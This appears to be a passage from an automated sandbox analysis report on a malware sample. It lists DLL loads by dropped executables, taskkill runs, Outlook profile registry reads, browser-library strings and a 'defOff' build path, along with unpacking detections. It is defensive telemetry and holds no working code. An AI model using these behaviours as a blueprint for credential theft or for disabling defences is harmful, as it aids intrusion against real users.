Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.15.dr

LNK file: ..\AppData\Local\Temp\fC9wFW8u5FG512NReDwNwEK4w\Y-Cleaner.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1806848 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: Raw size of jmepqeib is bigger than: 0x100000 < 0x19ec00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2141301093.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: d985563cac.exe, 00000010.00000003.2996415101.0000000008590000.00000004.00001000.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3082074976.0000000006632000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2141301093.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW;
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Unpacked PE file: 9.2.CAFIJKFHIJ.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.500000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.500000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Unpacked PE file: 16.2.d985563cac.exe.970000.0.unpack :EW;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Unpacked PE file: 17.2.25045de666.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW;
